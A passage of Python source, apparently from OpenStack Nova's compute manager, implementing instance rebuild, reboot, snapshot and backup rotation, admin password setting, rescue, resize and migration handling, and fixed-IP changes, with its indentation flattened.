# TODO(cfriesen): this network_api call and the one above
# are so similar, we should really try to unify them.
self.network_api.setup_instance_network_on_host(
context, instance, self.host)
network_info = compute_utils.get_nw_info_for_instance(instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = \
self._get_instance_block_device_info(
context, instance, bdms=bdms)
def detach_block_devices(context, bdms):
for bdm in bdms:
if bdm.is_volume:
self._detach_volume(context, bdm.volume_id, instance,
destroy_bdm=False)
files = self._decode_files(injected_files)
kwargs = dict(
context=context,
instance=instance,
image_meta=image_meta,
injected_files=files,
admin_password=new_pass,
bdms=bdms,
detach_block_devices=detach_block_devices,
attach_block_devices=self._prep_block_device,
block_device_info=block_device_info,
network_info=network_info,
preserve_ephemeral=preserve_ephemeral,
recreate=recreate)
try:
self.driver.rebuild(**kwargs)
except NotImplementedError:
# NOTE(rpodolyaka): driver doesn't provide specialized version
# of rebuild, fall back to the default implementation
self._rebuild_default_impl(**kwargs)
self._update_instance_after_spawn(context, instance)
instance.save(expected_task_state=[task_states.REBUILD_SPAWNING])
if orig_vm_state == vm_states.STOPPED:
LOG.info(_LI("bringing vm to original state: '%s'"),
orig_vm_state, instance=instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save()
self.stop_instance(context, instance)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "rebuild.end",
network_info=network_info,
extra_usage_info=extra_usage_info)
def _handle_bad_volumes_detached(self, context, instance, bad_devices,
block_device_info):
"""Handle cases where the virt-layer had to detach non-working volumes
in order to complete an operation.
"""
for bdm in block_device_info['block_device_mapping']:
if bdm.get('mount_device') in bad_devices:
try:
volume_id = bdm['connection_info']['data']['volume_id']
except KeyError:
continue
# NOTE(sirp): ideally we'd just call
# `compute_api.detach_volume` here but since that hits the
# DB directly, that's off limits from within the
# compute-manager.
#
# API-detach
LOG.info(_LI("Detaching from volume api: %s"), volume_id)
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_detach(context, volume)
self.volume_api.begin_detaching(context, volume_id)
# Manager-detach
self.detach_volume(context, volume_id, instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def reboot_instance(self, context, instance, block_device_info,
reboot_type):
"""Reboot an instance on this host."""
# acknowledge the request made it to the manager
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_PENDING
expected_states = (task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED)
else:
instance.task_state = task_states.REBOOT_PENDING_HARD
expected_states = (task_states.REBOOTING_HARD,
task_states.REBOOT_PENDING_HARD,
task_states.REBOOT_STARTED_HARD)
context = context.elevated()
LOG.info(_LI("Rebooting instance"), context=context, instance=instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance, "reboot.start")
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=expected_states)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to reboot a non-running instance:'
' (state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
context=context, instance=instance)
def bad_volumes_callback(bad_devices):
self._handle_bad_volumes_detached(
context, instance, bad_devices, block_device_info)
try:
# Don't change it out of rescue mode
if instance.vm_state == vm_states.RESCUED:
new_vm_state = vm_states.RESCUED
else:
new_vm_state = vm_states.ACTIVE
new_power_state = None
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_STARTED
expected_state = task_states.REBOOT_PENDING
else:
instance.task_state = task_states.REBOOT_STARTED_HARD
expected_state = task_states.REBOOT_PENDING_HARD
instance.save(expected_task_state=expected_state)
self.driver.reboot(context, instance,
network_info,
reboot_type,
block_device_info=block_device_info,
bad_volumes_callback=bad_volumes_callback)
except Exception as error:
with excutils.save_and_reraise_exception() as ctxt:
exc_info = sys.exc_info()
# if the reboot failed but the VM is running don't
# put it into an error state
new_power_state = self._get_power_state(context, instance)
if new_power_state == power_state.RUNNING:
LOG.warning(_LW('Reboot failed but instance is running'),
context=context, instance=instance)
compute_utils.add_instance_fault_from_exc(context,
instance, error, exc_info)
self._notify_about_instance_usage(context, instance,
'reboot.error', fault=error)
ctxt.reraise = False
else:
LOG.error(_LE('Cannot reboot instance: %s'), error,
context=context, instance=instance)
self._set_instance_obj_error_state(context, instance)
if not new_power_state:
new_power_state = self._get_power_state(context, instance)
try:
instance.power_state = new_power_state
instance.vm_state = new_vm_state
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.warning(_LW("Instance disappeared during reboot"),
context=context, instance=instance)
self._notify_about_instance_usage(context, instance, "reboot.end")
@delete_image_on_error
def _do_snapshot_instance(self, context, image_id, instance, rotation):
if rotation < 0:
raise exception.RotationRequiredForBackup()
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_BACKUP)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def backup_instance(self, context, image_id, instance, backup_type,
rotation):
"""Backup an instance on this host.
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around
"""
self._do_snapshot_instance(context, image_id, instance, rotation)
self._rotate_backups(context, instance, backup_type, rotation)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
@delete_image_on_error
def snapshot_instance(self, context, image_id, instance):
"""Snapshot an instance on this host.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param image_id: glance.db.sqlalchemy.models.Image.Id
"""
# NOTE(dave-mcnally) the task state will already be set by the api
# but if the compute manager has crashed/been restarted prior to the
# request getting here the task state may have been cleared so we set
# it again and things continue normally
try:
instance.task_state = task_states.IMAGE_SNAPSHOT
instance.save(
expected_task_state=task_states.IMAGE_SNAPSHOT_PENDING)
except exception.InstanceNotFound:
# possibility instance no longer exists, no point in continuing
LOG.debug("Instance not found, could not set state %s "
"for instance.",
task_states.IMAGE_SNAPSHOT, instance=instance)
return
except exception.UnexpectedDeletingTaskStateError:
LOG.debug("Instance being deleted, snapshot cannot continue",
instance=instance)
return
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_SNAPSHOT)
def _snapshot_instance(self, context, image_id, instance,
expected_task_state):
context = context.elevated()
instance.power_state = self._get_power_state(context, instance)
try:
instance.save()
LOG.info(_LI('instance snapshotting'), context=context,
instance=instance)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to snapshot a non-running instance: '
'(state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
instance=instance)
self._notify_about_instance_usage(
context, instance, "snapshot.start")
def update_task_state(task_state,
expected_state=expected_task_state):
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self.driver.snapshot(context, instance, image_id,
update_task_state)
instance.task_state = None
instance.save(expected_task_state=task_states.IMAGE_UPLOADING)
self._notify_about_instance_usage(context, instance,
"snapshot.end")
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the snapshot
# Quickly bail out of here
msg = 'Instance disappeared during snapshot'
LOG.debug(msg, instance=instance)
try:
image_service = glance.get_default_image_service()
image = image_service.show(context, image_id)
if image['status'] != 'active':
image_service.delete(context, image_id)
except Exception:
LOG.warning(_LW("Error while trying to clean up image %s"),
image_id, instance=instance)
except exception.ImageNotFound:
instance.task_state = None
instance.save()
msg = _LW("Image not found during snapshot")
LOG.warn(msg, instance=instance)
def _post_interrupted_snapshot_cleanup(self, context, instance):
self.driver.post_interrupted_snapshot_cleanup(context, instance)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
self.driver.volume_snapshot_create(context, instance, volume_id,
create_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info):
self.driver.volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info)
@wrap_instance_fault
def _rotate_backups(self, context, instance, backup_type, rotation):
"""Delete excess backups associated to an instance.
Instances are allowed a fixed number of backups (the rotation number);
this method deletes the oldest backups that exceed the rotation
threshold.
:param context: security context
:param instance: Instance dict
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
"""
filters = {'property-image_type': 'backup',
'property-backup_type': backup_type,
'property-instance_uuid': instance.uuid}
images = self.image_api.get_all(context, filters=filters,
sort_key='created_at', sort_dir='desc')
num_images = len(images)
LOG.debug("Found %(num_images)d images (rotation: %(rotation)d)",
{'num_images': num_images, 'rotation': rotation},
instance=instance)
if num_images > rotation:
# NOTE(sirp): this deletes all backups that exceed the rotation
# limit
excess = len(images) - rotation
LOG.debug("Rotating out %d backups", excess,
instance=instance)
for i in xrange(excess):
image = images.pop()
image_id = image['id']
LOG.debug("Deleting image %s", image_id,
instance=instance)
self.image_api.delete(context, image_id)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def set_admin_password(self, context, instance, new_pass):
"""Set the root/admin password for an instance on this host.
This is generally only called by API password resets after an
image has been built.
@param context: Nova auth context.
@param instance: Nova instance object.
@param new_pass: The admin password for the instance.
"""
context = context.elevated()
if new_pass is None:
# Generate a random password
new_pass = utils.generate_password()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
instance.task_state = None
instance.save(expected_task_state=task_states.UPDATING_PASSWORD)
_msg = _('instance %s is not running') % instance.uuid
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
try:
self.driver.set_admin_password(instance, new_pass)
LOG.info(_LI("Root password set"), instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except NotImplementedError:
LOG.warning(_LW('set_admin_password is not implemented '
'by this driver or guest instance.'),
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
raise NotImplementedError(_('set_admin_password is not '
'implemented by this driver or guest '
'instance.'))
except exception.UnexpectedTaskStateError:
# interrupted by another (most likely delete) task
# do not retry
raise
except Exception:
# Catch all here because this could be anything.
LOG.exception(_LE('set_admin_password failed'),
instance=instance)
self._set_instance_obj_error_state(context, instance)
# We create a new exception here so that we won't
# potentially reveal password information to the
# API caller. The real exception is logged above
_msg = _('error setting admin password')
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def inject_file(self, context, path, file_contents, instance):
"""Write a file to the specified path in an instance on this host."""
# NOTE(russellb) Remove this method, as well as the underlying virt
# driver methods, when the compute rpc interface is bumped to 4.x
# as it is no longer used.
context = context.elevated()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
LOG.warning(_LW('trying to inject a file into a non-running '
'(state: %(current_state)s expected: '
'%(expected_state)s)'),
{'current_state': current_power_state,
'expected_state': expected_state},
instance=instance)
LOG.info(_LI('injecting file to %s'), path,
instance=instance)
self.driver.inject_file(instance, path, file_contents)
def _get_rescue_image(self, context, instance, rescue_image_ref=None):
"""Determine what image should be used to boot the rescue VM."""
# 1. If rescue_image_ref is passed in, use that for rescue.
# 2. Else, use the base image associated with instance's current image.
# The idea here is to provide the customer with a rescue
# environment which they are familiar with.
# So, if they built their instance off of a Debian image,
# their rescue VM will also be Debian.
# 3. As a last resort, use instance's current image.
if not rescue_image_ref:
system_meta = utils.instance_sys_meta(instance)
rescue_image_ref = system_meta.get('image_base_image_ref')
if not rescue_image_ref:
LOG.warning(_LW('Unable to find a different image to use for '
'rescue VM, using instance\'s current image'),
instance=instance)
rescue_image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(context, self.image_api,
rescue_image_ref,
instance)
# NOTE(belliott) bug #1227350 - xenapi needs the actual image id
image_meta['id'] = rescue_image_ref
return image_meta
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rescue_instance(self, context, instance, rescue_password,
rescue_image_ref=None, clean_shutdown=True):
context = context.elevated()
LOG.info(_LI('Rescuing'), context=context, instance=instance)
admin_password = (rescue_password if rescue_password else
utils.generate_password())
network_info = self._get_instance_nw_info(context, instance)
rescue_image_meta = self._get_rescue_image(context, instance,
rescue_image_ref)
extra_usage_info = {'rescue_image_name':
rescue_image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rescue.start", extra_usage_info=extra_usage_info,
network_info=network_info)
try:
self._power_off_instance(context, instance, clean_shutdown)
self.driver.rescue(context, instance,
network_info,
rescue_image_meta, admin_password)
except Exception as e:
LOG.exception(_LE("Error trying to Rescue Instance"),
instance=instance)
raise exception.InstanceNotRescuable(
instance_id=instance.uuid,
reason=_("Driver Error: %s") % e)
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
instance.vm_state = vm_states.RESCUED
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESCUING)
self._notify_about_instance_usage(context, instance,
"rescue.end", extra_usage_info=extra_usage_info,
network_info=network_info)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unrescue_instance(self, context, instance):
context = context.elevated()
LOG.info(_LI('Unrescuing'), context=context, instance=instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance,
"unrescue.start", network_info=network_info)
with self._error_out_instance_on_exception(context, instance):
self.driver.unrescue(instance,
network_info)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=task_states.UNRESCUING)
self._notify_about_instance_usage(context,
instance,
"unrescue.end",
network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def change_instance_metadata(self, context, diff, instance):
"""Update the metadata published to the instance."""
LOG.debug("Changing instance metadata according to %r",
diff, instance=instance)
self.driver.change_instance_metadata(context, instance, diff)
def _cleanup_stored_instance_types(self, instance, restore_old=False):
"""Clean up "old" and "new" instance_type information stored in
instance's system_metadata. Optionally update the "current"
instance_type to the saved old one first.
Returns the updated system_metadata as a dict, the
post-cleanup current instance type and the to-be dropped
instance type.
"""
sys_meta = instance.system_metadata
if restore_old:
instance_type = instance.get_flavor('old')
drop_instance_type = instance.get_flavor()
instance.set_flavor(instance_type)
else:
instance_type = instance.get_flavor()
drop_instance_type = instance.get_flavor('old')
instance.delete_flavor('old')
instance.delete_flavor('new')
return sys_meta, instance_type, drop_instance_type
@wrap_exception()
@wrap_instance_event
@wrap_instance_fault
def confirm_resize(self, context, instance, reservations, migration):
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
@utils.synchronized(instance.uuid)
def do_confirm_resize(context, instance, migration_id):
# NOTE(wangpan): Get the migration status from db, if it has been
# confirmed, we do nothing and return here
LOG.debug("Going to confirm migration %s", migration_id,
context=context, instance=instance)
try:
# TODO(russellb) Why are we sending the migration object just
# to turn around and look it up from the db again?
migration = objects.Migration.get_by_id(
context.elevated(), migration_id)
except exception.MigrationNotFound:
LOG.error(_LE("Migration %s is not found during confirmation"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
if migration.status == 'confirmed':
LOG.info(_LI("Migration %s is already confirmed"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
elif migration.status not in ('finished', 'confirming'):
LOG.warning(_LW("Unexpected confirmation status '%(status)s' "
"of migration %(id)s, exit confirmation "
"process"),
{"status": migration.status, "id": migration_id},
context=context, instance=instance)
quotas.rollback()
return
# NOTE(wangpan): Get the instance from db, if it has been
# deleted, we do nothing and return here
expected_attrs = ['metadata', 'system_metadata', 'flavor']
try:
instance = objects.Instance.get_by_uuid(
context, instance.uuid,
expected_attrs=expected_attrs)
except exception.InstanceNotFound:
LOG.info(_LI("Instance is not found during confirmation"),
context=context, instance=instance)
quotas.rollback()
return
self._confirm_resize(context, instance, quotas,
migration=migration)
do_confirm_resize(context, instance, migration.id)
def _confirm_resize(self, context, instance, quotas,
migration=None):
"""Destroys the source instance."""
self._notify_about_instance_usage(context, instance,
"resize.confirm.start")
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(danms): delete stashed migration information
sys_meta, instance_type, old_instance_type = (
self._cleanup_stored_instance_types(instance))
sys_meta.pop('old_vm_state', None)
instance.system_metadata = sys_meta
instance.save()
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute, teardown=True)
network_info = self._get_instance_nw_info(context, instance)
self.driver.confirm_migration(migration, instance,
network_info)
migration.status = 'confirmed'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(migration.source_node)
rt.drop_resize_claim(context, instance, old_instance_type)
# NOTE(mriedem): The old_vm_state could be STOPPED but the user
# might have manually powered up the instance to confirm the
# resize/migrate, so we need to check the current power state
# on the instance and set the vm_state appropriately. We default
# to ACTIVE because if the power state is not SHUTDOWN, we
# assume _sync_instance_power_state will clean it up.
p_state = instance.power_state
vm_state = None
if p_state == power_state.SHUTDOWN:
vm_state = vm_states.STOPPED
LOG.debug("Resized/migrated instance is powered off. "
"Setting vm_state to '%s'.", vm_state,
instance=instance)
else:
vm_state = vm_states.ACTIVE
instance.vm_state = vm_state
instance.task_state = None
instance.save(expected_task_state=[None, task_states.DELETING])
self._notify_about_instance_usage(
context, instance, "resize.confirm.end",
network_info=network_info)
quotas.commit()
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def revert_resize(self, context, instance, migration, reservations):
"""Destroys the new instance on the destination machine.
Reverts the model changes, and powers on the old instance on the
source machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
# NOTE(comstud): A revert_resize is essentially a resize back to
# the old size, so we need to send a usage event here.
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
teardown=True)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
destroy_disks = not self._is_instance_storage_shared(
context, instance, host=migration.source_compute)
self.driver.destroy(context, instance, network_info,
block_device_info, destroy_disks)
self._terminate_volume_connections(context, instance, bdms)
migration.status = 'reverted'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(instance.node)
rt.drop_resize_claim(context, instance)
self.compute_rpcapi.finish_revert_resize(context, instance,
migration, migration.source_compute,
quotas.reservations)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_revert_resize(self, context, instance, reservations, migration):
"""Finishes the second half of reverting a resize.
Bring the original source instance state back (active/shutoff) and
revert the resized attributes in the database.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.start")
sys_meta, instance_type, drop_instance_type = (
self._cleanup_stored_instance_types(instance, True))
# NOTE(mriedem): delete stashed old_vm_state information; we
# default to ACTIVE for backwards compatibility if old_vm_state
# is not set
old_vm_state = sys_meta.pop('old_vm_state', vm_states.ACTIVE)
instance.system_metadata = sys_meta
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.instance_type_id = instance_type['id']
instance.host = migration.source_compute
instance.node = migration.source_node
instance.save()
migration.dest_compute = migration.source_compute
with migration.obj_as_admin():
migration.save()
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
power_on = old_vm_state != vm_states.STOPPED
self.driver.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_REVERTING)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
# if the original vm state was STOPPED, set it back to STOPPED
LOG.info(_LI("Updating instance to original state: '%s'"),
old_vm_state)
if power_on:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save()
else:
instance.task_state = task_states.POWERING_OFF
instance.save()
self.stop_instance(context, instance=instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.end")
quotas.commit()
def _prep_resize(self, context, image, instance, instance_type,
quotas, request_spec, filter_properties, node,
clean_shutdown=True):
if not filter_properties:
filter_properties = {}
if not instance.host:
self._set_instance_error_state(context, instance)
msg = _('Instance has no source host')
raise exception.MigrationError(reason=msg)
same_host = instance.host == self.host
if same_host and not CONF.allow_resize_to_same_host:
self._set_instance_error_state(context, instance)
msg = _('destination same as source!')
raise exception.MigrationError(reason=msg)
# NOTE(danms): Stash the new instance_type to avoid having to
# look it up in the database later
instance.set_flavor(instance_type, 'new')
# NOTE(mriedem): Stash the old vm_state so we can set the
# resized/reverted instance back to the same state later.
vm_state = instance.vm_state
LOG.debug('Stashing vm_state: %s', vm_state, instance=instance)
instance.system_metadata['old_vm_state'] = vm_state
instance.save()
limits = filter_properties.get('limits', {})
rt = self._get_resource_tracker(node)
with rt.resize_claim(context, instance, instance_type,
image_meta=image, limits=limits) as claim:
LOG.info(_LI('Migrating'), context=context, instance=instance)
self.compute_rpcapi.resize_instance(
context, instance, claim.migration, image,
instance_type, quotas.reservations,
clean_shutdown)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def prep_resize(self, context, image, instance, instance_type,
reservations, request_spec, filter_properties, node,
clean_shutdown=True):
"""Initiates the process of moving a running instance to another host.
Possibly changes the RAM and disk size in the process.
"""
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node,
instance=instance)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(
context, instance, "resize.prep.start")
try:
self._prep_resize(context, image, instance,
instance_type, quotas,
request_spec, filter_properties,
node, clean_shutdown)
# NOTE(dgenin): This is thrown in LibvirtDriver when the
# instance to be migrated is backed by LVM.
# Remove when LVM migration is implemented.
except exception.MigrationPreCheckError:
raise
except Exception:
# try to re-schedule the resize elsewhere:
exc_info = sys.exc_info()
self._reschedule_resize_or_reraise(context, image, instance,
exc_info, instance_type, quotas, request_spec,
filter_properties)
finally:
extra_usage_info = dict(
new_instance_type=instance_type['name'],
new_instance_type_id=instance_type['id'])
self._notify_about_instance_usage(
context, instance, "resize.prep.end",
extra_usage_info=extra_usage_info)
def _reschedule_resize_or_reraise(self, context, image, instance, exc_info,
instance_type, quotas, request_spec, filter_properties):
"""Try to re-schedule the resize or re-raise the original error to
error out the instance.
"""
if not request_spec:
request_spec = {}
if not filter_properties:
filter_properties = {}
rescheduled = False
instance_uuid = instance.uuid
try:
reschedule_method = self.compute_task_api.resize_instance
scheduler_hint = dict(filter_properties=filter_properties)
method_args = (instance, None, scheduler_hint, instance_type,
quotas.reservations)
task_state = task_states.RESIZE_PREP
rescheduled = self._reschedule(context, request_spec,
filter_properties, instance, reschedule_method,
method_args, task_state, exc_info)
except Exception as error:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, error,
exc_info=sys.exc_info())
self._notify_about_instance_usage(context, instance,
'resize.error', fault=error)
if rescheduled:
self._log_original_error(exc_info, instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'resize.error', fault=exc_info[1])
else:
# not re-scheduling
raise exc_info[0], exc_info[1], exc_info[2]
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def resize_instance(self, context, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
"""Starts the migration of a running instance to another host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if (not instance_type or
not isinstance(instance_type, objects.Flavor)):
instance_type = objects.Flavor.get_by_id(
context, migration['new_instance_type_id'])
network_info = self._get_instance_nw_info(context, instance)
migration.status = 'migrating'
with migration.obj_as_admin():
migration.save()
instance.task_state = task_states.RESIZE_MIGRATING
instance.save(expected_task_state=task_states.RESIZE_PREP)
self._notify_about_instance_usage(
context, instance, "resize.start", network_info=network_info)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
disk_info = self.driver.migrate_disk_and_power_off(
context, instance, migration.dest_host,
instance_type, network_info,
block_device_info,
timeout, retry_interval)
self._terminate_volume_connections(context, instance, bdms)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
migration.status = 'post-migrating'
with migration.obj_as_admin():
migration.save()
instance.host = migration.dest_compute
instance.node = migration.dest_node
instance.task_state = task_states.RESIZE_MIGRATED
instance.save(expected_task_state=task_states.RESIZE_MIGRATING)
self.compute_rpcapi.finish_resize(context, instance,
migration, image, disk_info,
migration.dest_compute, reservations=quotas.reservations)
self._notify_about_instance_usage(context, instance, "resize.end",
network_info=network_info)
self.instance_events.clear_events_for_instance(instance)
def _terminate_volume_connections(self, context, instance, bdms):
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
if bdm.is_volume:
self.volume_api.terminate_connection(context, bdm.volume_id,
connector)
@staticmethod
def _set_instance_info(instance, instance_type):
instance.instance_type_id = instance_type['id']
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.set_flavor(instance_type)
def _finish_resize(self, context, instance, migration, disk_info,
image):
resize_instance = False
old_instance_type_id = migration['old_instance_type_id']
new_instance_type_id = migration['new_instance_type_id']
old_instance_type = instance.get_flavor()
# NOTE(mriedem): Get the old_vm_state so we know if we should
# power on the instance. If old_vm_state is not set we need to default
# to ACTIVE for backwards compatibility
old_vm_state = instance.system_metadata.get('old_vm_state',
vm_states.ACTIVE)
instance.set_flavor(old_instance_type, 'old')
if old_instance_type_id != new_instance_type_id:
instance_type = instance.get_flavor('new')
self._set_instance_info(instance, instance_type)
resize_instance = True
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
migration['dest_compute'])
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
instance.task_state = task_states.RESIZE_FINISH
instance.save(expected_task_state=task_states.RESIZE_MIGRATED)
self._notify_about_instance_usage(
context, instance, "finish_resize.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
# NOTE(mriedem): If the original vm_state was STOPPED, we don't
# automatically power on the instance after it's migrated
power_on = old_vm_state != vm_states.STOPPED
try:
self.driver.finish_migration(context, migration, instance,
disk_info,
network_info,
image, resize_instance,
block_device_info, power_on)
except Exception:
with excutils.save_and_reraise_exception():
if resize_instance:
self._set_instance_info(instance,
old_instance_type)
migration.status = 'finished'
with migration.obj_as_admin():
migration.save()
instance.vm_state = vm_states.RESIZED
instance.task_state = None
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_FINISH)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "finish_resize.end",
network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_resize(self, context, disk_info, image, instance,
reservations, migration):
"""Completes the migration process.
Sets up the newly transferred disk and turns on the instance at its
new host machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._finish_resize(context, instance, migration,
disk_info, image)
quotas.commit()
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
with excutils.save_and_reraise_exception():
try:
quotas.rollback()
except Exception:
LOG.exception(_LE("Failed to rollback quota for failed "
"finish_resize"),
instance=instance)
self._set_instance_error_state(context, instance)
@object_compat
@wrap_exception()
@wrap_instance_fault
def add_fixed_ip_to_instance(self, context, network_id, instance):
"""Calls network_api to add new fixed_ip to instance
then injects the new network info and resets instance networking.
"""
self._notify_about_instance_usage(
context, instance, "create_ip.start")
network_info = self.network_api.add_fixed_ip_to_instance(context,
instance,
network_id)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "create_ip.end", network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def remove_fixed_ip_from_instance(self, context, address, instance):
"""Calls network_api to remove existing fixed_ip from instance
by injecting the altered network info and resetting
instance networking.
"""
self._notify_about_instance_usage(
context, instance, "delete_ip.start")
network_info = self.network_api.remove_fixed_ip_from_instance(context,
instance,
address)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
